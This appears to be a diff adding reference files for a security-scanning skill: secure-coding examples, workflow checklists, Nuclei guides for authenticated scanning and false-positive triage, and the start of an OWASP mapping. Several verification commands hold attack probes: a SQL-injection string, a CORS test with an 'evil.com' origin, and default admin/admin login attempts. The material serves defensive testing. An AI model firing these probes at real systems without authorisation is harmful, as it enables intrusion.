return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,489 @@
# Nuclei Authentication Patterns
## Table of Contents
- [Bearer Token Authentication](#bearer-token-authentication)
- [Cookie-Based Authentication](#cookie-based-authentication)
- [API Key Authentication](#api-key-authentication)
- [OAuth 2.0 Authentication](#oauth-20-authentication)
- [Custom Authentication Scripts](#custom-authentication-scripts)
- [Multi-Factor Authentication](#multi-factor-authentication)
## Bearer Token Authentication
### Basic Bearer Token
```bash
# Using header flag
nuclei -u https://api.target.com \
-header "Authorization: Bearer $AUTH_TOKEN" \
-severity critical,high
# Using environment variable
export AUTH_TOKEN="your-token-here"
nuclei -u https://api.target.com \
-header "Authorization: Bearer $AUTH_TOKEN"
```
### JWT Token with Refresh
```bash
# Initial authentication to get token
TOKEN=$(curl -X POST https://api.target.com/auth/login \
-d '{"username":"test","password":"test"}' \
-H "Content-Type: application/json" | jq -r '.access_token')
# Scan with token
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-tags api,cve
# Refresh token if needed
REFRESH_TOKEN=$(curl -X POST https://api.target.com/auth/refresh \
-H "Authorization: Bearer $TOKEN" | jq -r '.access_token')
```
## Cookie-Based Authentication
### Session Cookie Authentication
```bash
# Login and extract session cookie
curl -c cookies.txt -X POST https://target-app.com/login \
-d "username=testuser&password=testpass"
# Extract cookie value
SESSION=$(grep session cookies.txt | awk '{print $7}')
# Scan with session cookie
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION" \
-severity critical,high
```
### Multiple Cookies
```bash
# Multiple cookies can be specified
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION; user_id=$USER_ID; csrf_token=$CSRF" \
-tags cve,owasp
```
## API Key Authentication
### Header-Based API Key
```bash
# API key in header
nuclei -u https://api.target.com \
-header "X-API-Key: $API_KEY" \
-tags api,exposure
# Multiple API authentication headers
nuclei -u https://api.target.com \
-header "X-API-Key: $API_KEY" \
-header "X-Client-ID: $CLIENT_ID" \
-tags api
```
### Query Parameter API Key
Create custom template for query parameter auth:
```yaml
id: api-scan-with-query-auth
info:
name: API Scan with Query Parameter Auth
author: security-team
severity: info
http:
- method: GET
path:
- "{{BaseURL}}/api/endpoint?api_key={{api_key}}"
payloads:
api_key:
- "{{env('API_KEY')}}"
```
## OAuth 2.0 Authentication
### Client Credentials Flow
```bash
# Get access token
ACCESS_TOKEN=$(curl -X POST https://auth.target.com/oauth/token \
-d "grant_type=client_credentials" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" \
-H "Content-Type: application/x-www-form-urlencoded" | jq -r '.access_token')
# Scan with OAuth token
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN" \
-tags api,cve
```
### Authorization Code Flow
```bash
# Step 1: Manual authorization to get code
# Navigate to: https://auth.target.com/oauth/authorize?client_id=$CLIENT_ID&redirect_uri=$REDIRECT_URI&response_type=code
# Step 2: Exchange code for token
AUTH_CODE="received-from-redirect"
ACCESS_TOKEN=$(curl -X POST https://auth.target.com/oauth/token \
-d "grant_type=authorization_code" \
-d "code=$AUTH_CODE" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" \
-d "redirect_uri=$REDIRECT_URI" | jq -r '.access_token')
# Step 3: Scan
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN"
```
### OAuth Token Refresh
```bash
#!/bin/bash
# oauth_refresh_scan.sh
CLIENT_ID="your-client-id"
CLIENT_SECRET="your-client-secret"
REFRESH_TOKEN="your-refresh-token"
# Function to get fresh access token
get_access_token() {
curl -s -X POST https://auth.target.com/oauth/token \
-d "grant_type=refresh_token" \
-d "refresh_token=$REFRESH_TOKEN" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" | jq -r '.access_token'
}
# Get token and scan
ACCESS_TOKEN=$(get_access_token)
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN" \
-tags api,cve,owasp
```
## Custom Authentication Scripts
### Form-Based Login Script
```python
#!/usr/bin/env python3
import requests
import subprocess
import sys
def login_and_get_session():
"""Login and return session cookie"""
session = requests.Session()
# Perform login
login_data = {
"username": "testuser",
"password": "testpassword"
}
response = session.post(
"https://target-app.com/login",
data=login_data
)
if response.status_code != 200:
print(f"Login failed: {response.status_code}", file=sys.stderr)
sys.exit(1)
# Extract session cookie
session_cookie = session.cookies.get("session")
return session_cookie
def run_nuclei_scan(session_cookie, target_url):
"""Run Nuclei with authenticated session"""
cmd = [
"nuclei",
"-u", target_url,
"-header", f"Cookie: session={session_cookie}",
"-severity", "critical,high",
"-tags", "cve,owasp"
]
result = subprocess.run(cmd)
return result.returncode
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "https://target-app.com"
print("Authenticating...")
session = login_and_get_session()
print("Running Nuclei scan...")
exit_code = run_nuclei_scan(session, target)
sys.exit(exit_code)
```
### SAML Authentication
```python
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import subprocess
def saml_login(idp_url, username, password):
"""Perform SAML authentication flow"""
session = requests.Session()
# Step 1: Get SAML request from SP
sp_response = session.get("https://target-app.com/saml/login")
# Step 2: Submit credentials to IdP
soup = BeautifulSoup(sp_response.text, 'html.parser')
saml_request = soup.find('input', {'name': 'SAMLRequest'})['value']
idp_login = session.post(
idp_url,
data={
'username': username,
'password': password,
'SAMLRequest': saml_request
}
)
# Step 3: Submit SAML response back to SP
soup = BeautifulSoup(idp_login.text, 'html.parser')
saml_response = soup.find('input', {'name': 'SAMLResponse'})['value']
sp_acs = session.post(
"https://target-app.com/saml/acs",
data={'SAMLResponse': saml_response}
)
# Return session cookie
return session.cookies.get_dict()
# Use in Nuclei scan
cookies = saml_login(
"https://idp.example.com/saml/login",
"testuser",
"testpass"
)
cookie_header = "; ".join([f"{k}={v}" for k, v in cookies.items()])
subprocess.run([
"nuclei",
"-u", "https://target-app.com",
"-header", f"Cookie: {cookie_header}",
"-severity", "critical,high"
])
```
## Multi-Factor Authentication
### TOTP-Based MFA
```python
#!/usr/bin/env python3
import pyotp
import requests
import subprocess
def login_with_mfa(username, password, totp_secret):
"""Login with username, password, and TOTP"""
session = requests.Session()
# Step 1: Submit username and password
login_response = session.post(
"https://target-app.com/login",
data={
"username": username,
"password": password
}
)
# Step 2: Generate and submit TOTP code
totp = pyotp.TOTP(totp_secret)
mfa_code = totp.now()
mfa_response = session.post(
"https://target-app.com/mfa/verify",
data={"code": mfa_code}
)
if mfa_response.status_code != 200:
raise Exception("MFA verification failed")
return session.cookies.get("session")
# Use in scan
session_cookie = login_with_mfa(
"testuser",
"testpass",
"JBSWY3DPEHPK3PXP" # TOTP secret
)
subprocess.run([
"nuclei",
"-u", "https://target-app.com",
"-header", f"Cookie: session={session_cookie}",
"-tags", "cve,owasp"
])
```
### SMS/Email MFA (Manual Intervention)
```bash
#!/bin/bash
# mfa_manual_scan.sh
echo "Step 1: Performing initial login..."
curl -c cookies.txt -X POST https://target-app.com/login \
-d "username=testuser&password=testpass"
echo "Step 2: MFA code sent. Please check your email/SMS."
read -p "Enter MFA code: " MFA_CODE
echo "Step 3: Submitting MFA code..."
curl -b cookies.txt -c cookies.txt -X POST https://target-app.com/mfa/verify \
-d "code=$MFA_CODE"
echo "Step 4: Running Nuclei scan with authenticated session..."
SESSION=$(grep session cookies.txt | awk '{print $7}')
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION" \
-severity critical,high \
-tags cve,owasp
echo "Scan complete!"
```
## Advanced Patterns
### Dynamic Token Rotation
```bash
#!/bin/bash
# token_rotation_scan.sh
TARGET_URL="https://api.target.com"
AUTH_ENDPOINT="https://auth.target.com/token"
CLIENT_ID="client-id"
CLIENT_SECRET="client-secret"
# Function to get new token
refresh_token() {
curl -s -X POST $AUTH_ENDPOINT \
-d "grant_type=client_credentials" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" | jq -r '.access_token'
}
# Get initial token
TOKEN=$(refresh_token)
# Scan critical templates
nuclei -u $TARGET_URL \
-header "Authorization: Bearer $TOKEN" \
-severity critical \
-tags cve
# Refresh token for next batch
TOKEN=$(refresh_token)
# Scan high severity templates
nuclei -u $TARGET_URL \
-header "Authorization: Bearer $TOKEN" \
-severity high \
-tags owasp
```
### Authenticated Multi-Target Scanning
```bash
#!/bin/bash
# multi_target_auth_scan.sh
# Read targets from file
TARGETS_FILE="targets.txt"
AUTH_TOKEN="your-auth-token"
while IFS= read -r target; do
echo "Scanning: $target"
nuclei -u "$target" \
-header "Authorization: Bearer $AUTH_TOKEN" \
-severity critical,high \
-o "results/$(echo $target | sed 's|https://||' | sed 's|/|_|g').txt"
sleep 5 # Rate limiting between targets
done < "$TARGETS_FILE"
echo "All scans complete!"
```
## Best Practices
1. **Never Hardcode Credentials**: Use environment variables or secrets management
2. **Rotate Tokens**: Refresh authentication tokens for long-running scans
3. **Session Validation**: Verify session is still valid before scanning
4. **Rate Limiting**: Respect rate limits when authenticated (often higher quotas)
5. **Scope Validation**: Ensure authenticated access doesn't expand out of scope
6. **Audit Logging**: Log all authenticated scan activities
7. **Token Expiry**: Handle token expiration gracefully with refresh
8. **Least Privilege**: Use accounts with minimum necessary privileges for testing
## Troubleshooting
### Token Expired During Scan
```bash
# Add token refresh logic
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-severity critical || {
echo "Scan failed, refreshing token..."
TOKEN=$(refresh_token)
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-severity critical
}
```
### Session Cookie Not Working
```bash
# Debug session cookie
curl -v https://target-app.com/protected-page \
-H "Cookie: session=$SESSION"
# Check cookie expiration
echo $SESSION | base64 -d | jq '.exp'
# Re-authenticate if expired
SESSION=$(re_authenticate)
```
### Multiple Authentication Methods
```bash
# Some APIs require multiple auth headers
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-header "X-API-Key: $API_KEY" \
-header "X-Client-ID: $CLIENT_ID" \
-tags api
```
## Resources
- [OAuth 2.0 RFC](https://oauth.net/2/)
- [JWT.io](https://jwt.io/)
- [SAML 2.0](http://saml.xml.org/)
- [Nuclei Authentication Docs](https://docs.projectdiscovery.io/)

View File

@@ -0,0 +1,491 @@
# Nuclei False Positive Handling Guide
## Table of Contents
- [Understanding False Positives](#understanding-false-positives)
- [Common False Positive Scenarios](#common-false-positive-scenarios)
- [Verification Techniques](#verification-techniques)
- [Template Filtering Strategies](#template-filtering-strategies)
- [Custom Template Refinement](#custom-template-refinement)
## Understanding False Positives
False positives occur when Nuclei reports a finding that doesn't represent an actual security vulnerability in the context of your application.
### Types of False Positives
1. **Context-Specific**: Finding is valid in general but not applicable to your application
2. **Version-Specific**: CVE template triggers but your version is patched
3. **Configuration-Based**: Security control exists but Nuclei can't detect it
4. **Pattern Matching Errors**: Regex/word matchers trigger on benign content
## Common False Positive Scenarios
### 1. Missing Security Headers (Info/Low Severity)
**Finding**: Missing `X-Frame-Options`, `Content-Security-Policy`
**False Positive When**:
- Headers set at CDN/WAF level (not visible to scanner)
- Application is not intended for browser rendering (pure API)
- Modern browsers already protect against clickjacking
**Verification**:
```bash
# Check headers from actual browser
curl -I https://target-app.com
curl -I https://target-app.com -H "User-Agent: Mozilla/5.0"
# Check if CDN adds headers
curl -I https://target-app.com -v 2>&1 | grep -i "x-frame-options\|content-security"
```
**Filter Strategy**:
```bash
# Exclude header-related info findings
nuclei -u https://target-app.com -etags headers -severity critical,high
```
### 2. Directory Listing / Exposed Paths
**Finding**: Directory listing enabled, exposed paths like `/admin`, `/backup`
**False Positive When**:
- Path requires authentication (Nuclei tested unauthenticated)
- Path is intentionally public (documentation, public assets)
- CDN/WAF blocks access (returns 200 with error page)
**Verification**:
```bash
# Manual verification with authentication
curl https://target-app.com/admin \
-H "Authorization: Bearer $TOKEN" \
-H "Cookie: session=$SESSION"
# Check actual response content
curl https://target-app.com/backup | head -20
```
**Filter Strategy**:
```bash
# Exclude exposure templates for authenticated scans
nuclei -u https://target-app.com \
-header "Authorization: Bearer $TOKEN" \
-etags exposure
```
### 3. CVE Templates Against Patched Versions
**Finding**: CVE-2024-XXXXX detected
**False Positive When**:
- Application version is patched but template matches on generic patterns
- Backported patches applied without version number change
- Template uses loose detection criteria
**Verification**:
```bash
# Check actual version
curl https://target-app.com/version
curl https://target-app.com -v 2>&1 | grep -i "server:"
# Cross-reference with CVE details
# Check if version is vulnerable per NVD/vendor advisory
```
**Filter Strategy**:
```bash
# Scan only recent CVEs
nuclei -u https://target-app.com \
-tags cve \
-template-condition "contains(id, 'CVE-2024') || contains(id, 'CVE-2023')"
# Exclude specific false positive templates
nuclei -u https://target-app.com \
-exclude-id CVE-2018-12345,CVE-2019-67890
```
### 4. Technology Detection False Positives
**Finding**: WordPress, Drupal, or other CMS detected
**False Positive When**:
- Generic strings match (like "wp-" in custom code)
- Legacy migration artifacts remain
- Application mimics CMS structure but isn't actually that CMS
**Verification**:
```bash
# Check for actual CMS files
curl https://target-app.com/wp-admin/
curl https://target-app.com/wp-includes/
curl https://target-app.com/readme.html
# Technology fingerprinting
whatweb https://target-app.com
wappalyzer https://target-app.com
```
**Filter Strategy**:
```bash
# Exclude tech detection templates
nuclei -u https://target-app.com -etags tech
```
### 5. Default Login Pages
**Finding**: Admin panel or login page detected
**False Positive When**:
- Panel is legitimate and intended to be accessible
- Panel requires MFA even if default credentials work
- Detection based on title/strings only without credential testing
**Verification**:
```bash
# Test if default credentials actually work
curl -X POST https://target-app.com/login \
-d "username=admin&password=admin" \
-v
# Check if MFA is required
curl -X POST https://target-app.com/login \
-d "username=admin&password=admin" \
-c cookies.txt
curl https://target-app.com/dashboard \
-b cookies.txt
```
**Filter Strategy**:
```bash
# Scan with authentication to skip login detection
nuclei -u https://target-app.com \
-header "Authorization: Bearer $TOKEN" \
-etags default-logins,exposed-panels
```
### 6. API Endpoints Reporting Errors
**Finding**: SQL errors, stack traces, or verbose errors detected
**False Positive When**:
- Errors are intentional validation messages
- Stack traces only shown in dev/staging (not production)
- API returns structured error JSON (not actual stack trace)
**Verification**:
```bash
# Check actual error response
curl https://api.target.com/endpoint?id=invalid -v
# Verify it's not SQL error but validation error
curl https://api.target.com/endpoint?id=' OR '1'='1 -v
```
### 7. CORS Misconfiguration
**Finding**: `Access-Control-Allow-Origin: *`
**False Positive When**:
- Intentional for public APIs
- Only applies to non-sensitive endpoints
- Additional CORS headers restrict actual access
**Verification**:
```bash
# Check if sensitive endpoints have CORS
curl https://api.target.com/public/data \
-H "Origin: https://evil.com" -v
curl https://api.target.com/private/users \
-H "Origin: https://evil.com" \
-H "Authorization: Bearer $TOKEN" -v
```
## Verification Techniques
### Manual Verification Checklist
For each critical/high severity finding:
1. **Reproduce the finding**:
```bash
# Use exact URL and parameters from Nuclei output
curl "https://target-app.com/vulnerable-path" -v
```
2. **Check authentication context**:
```bash
# Test with authentication
curl "https://target-app.com/vulnerable-path" \
-H "Authorization: Bearer $TOKEN" -v
```
3. **Verify exploitability**:
- Can you actually exploit the vulnerability?
- Is there a working PoC?
- What's the actual impact?
4. **Check mitigating controls**:
- WAF rules blocking exploitation
- Network segmentation limiting access
- Monitoring and alerting in place
5. **Consult security team**:
- Discuss edge cases with security engineers
- Review against threat model
### Automated Verification Script
Use bundled script to batch verify findings:
```bash
python3 scripts/verify_findings.py \
--input nuclei-results.jsonl \
--auth-token $AUTH_TOKEN \
--output verified-findings.jsonl
```
## Template Filtering Strategies
### Strategy 1: Severity-Based Filtering
Focus on high-impact findings:
```bash
# Critical and high only
nuclei -u https://target-app.com -severity critical,high
# Exclude info findings
nuclei -u https://target-app.com -exclude-severity info
```
### Strategy 2: Tag-Based Filtering
Filter by vulnerability type:
```bash
# Only CVEs and OWASP vulnerabilities
nuclei -u https://target-app.com -tags cve,owasp
# Exclude informational tags
nuclei -u https://target-app.com -etags tech,info,headers
```
### Strategy 3: Template Exclusion
Exclude known false positive templates:
```bash
# Exclude specific templates
nuclei -u https://target-app.com \
-exclude-id CVE-2018-12345,generic-login-panel
# Exclude template directories
nuclei -u https://target-app.com \
-exclude-templates nuclei-templates/http/misconfiguration/
```
### Strategy 4: Custom Template Allowlist
Use only verified templates:
```bash
# Scan with curated template set
nuclei -u https://target-app.com \
-t custom-templates/verified/ \
-t nuclei-templates/http/cves/2024/
```
### Strategy 5: Conditional Template Execution
Use template conditions:
```bash
# Only recent critical CVEs
nuclei -u https://target-app.com \
-tags cve \
-severity critical \
-template-condition "contains(id, 'CVE-2024')"
```
## Custom Template Refinement
### Improving Matcher Accuracy
**Before (High False Positives)**:
```yaml
matchers:
- type: word
words:
- "admin"
```
**After (Lower False Positives)**:
```yaml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "admin"
- "dashboard"
- "login"
condition: and
- type: regex
regex:
- '<title>[^<]*admin[^<]*panel[^<]*</title>'
case-insensitive: true
```
### Adding Negative Matchers
Exclude known false positive patterns:
```yaml
matchers:
- type: word
words:
- "SQL syntax error"
# Negative matcher - must NOT match
- type: word
negative: true
words:
- "validation error"
- "input error"
```
### Version-Specific Matching
Match specific vulnerable versions:
```yaml
matchers-condition: and
matchers:
- type: regex
regex:
- 'WordPress/([0-5]\.[0-9]\.[0-9])' # Versions < 6.0.0
- type: word
words:
- "wp-admin"
```
### Confidence-Based Classification
Add confidence levels to findings:
```yaml
info:
metadata:
confidence: high # low, medium, high
matchers-condition: and # More matchers = higher confidence
matchers:
- type: status
status: [200]
- type: word
words: ["vulnerable_signature_1", "vulnerable_signature_2"]
condition: and
- type: regex
regex: ['specific[_-]pattern']
```
## False Positive Tracking
### Document Known False Positives
Create suppression file:
```yaml
# false-positives.yaml
suppressions:
- template: CVE-2018-12345
reason: "Application version is patched (backport applied)"
verified_by: security-team
verified_date: 2024-11-20
- template: exposed-admin-panel
urls:
- https://target-app.com/admin
reason: "Admin panel requires MFA and IP allowlist"
verified_by: security-team
verified_date: 2024-11-20
- template: missing-csp-header
reason: "CSP header added at CDN level (Cloudflare)"
verified_by: devops-team
verified_date: 2024-11-20
```
### Use Suppression in Scans
```bash
# Filter out documented false positives
python3 scripts/filter_suppressions.py \
--scan-results nuclei-results.jsonl \
--suppressions false-positives.yaml \
--output filtered-results.jsonl
```
## Best Practices
1. **Always Verify Critical Findings Manually**: Don't trust automated tools blindly
2. **Context Matters**: What's vulnerable in one app may be safe in another
3. **Track False Positives**: Document and share with team
4. **Refine Templates**: Improve matcher accuracy over time
5. **Use Multiple Tools**: Cross-verify with other scanners (ZAP, Burp, etc.)
6. **Severity Calibration**: Adjust severity based on your environment
7. **Regular Template Updates**: Keep templates current to reduce false positives
8. **Authenticated Scanning**: Many false positives occur in unauthenticated scans
## Tools and Resources
### Verification Tools
```bash
# cURL for manual verification
curl -v https://target-app.com/endpoint
# httpie (user-friendly HTTP client)
http https://target-app.com/endpoint
# Burp Suite for manual testing
# ZAP for cross-verification
```
### Analysis Scripts
Use bundled scripts:
```bash
# Compare findings across scans
python3 scripts/compare_scans.py \
--baseline scan1.jsonl \
--current scan2.jsonl
# Filter findings by confidence
python3 scripts/filter_by_confidence.py \
--input scan-results.jsonl \
--min-confidence high \
--output high-confidence.jsonl
```
## Conclusion
False positives are inevitable in automated security scanning. The key is to:
- Understand WHY false positives occur
- Develop systematic verification processes
- Refine templates and filters over time
- Document and track false positives for future reference
- Balance automation with manual verification
A good rule of thumb: **Spend time refining your scanning approach to maximize signal-to-noise ratio**.

View File

@@ -0,0 +1,245 @@
# OWASP Top 10 2021 Mapping for Nuclei Findings
## Table of Contents
- [A01:2021 - Broken Access Control](#a012021---broken-access-control)
- [A02:2021 - Cryptographic Failures](#a022021---cryptographic-failures)
- [A03:2021 - Injection](#a032021---injection)
- [A04:2021 - Insecure Design](#a042021---insecure-design)
- [A05:2021 - Security Misconfiguration](#a052021---security-misconfiguration)
- [A06:2021 - Vulnerable and Outdated Components](#a062021---vulnerable-and-outdated-components)
- [A07:2021 - Identification and Authentication Failures](#a072021---identification-and-authentication-failures)
- [A08:2021 - Software and Data Integrity Failures](#a082021---software-and-data-integrity-failures)
- [A09:2021 - Security Logging and Monitoring Failures](#a092021---security-logging-and-monitoring-failures)
- [A10:2021 - Server-Side Request Forgery (SSRF)](#a102021---server-side-request-forgery-ssrf)
## A01:2021 - Broken Access Control
### Nuclei Template Tags
- `exposure` - Exposed sensitive files and directories
- `idor` - Insecure Direct Object References
- `auth-bypass` - Authentication bypass vulnerabilities
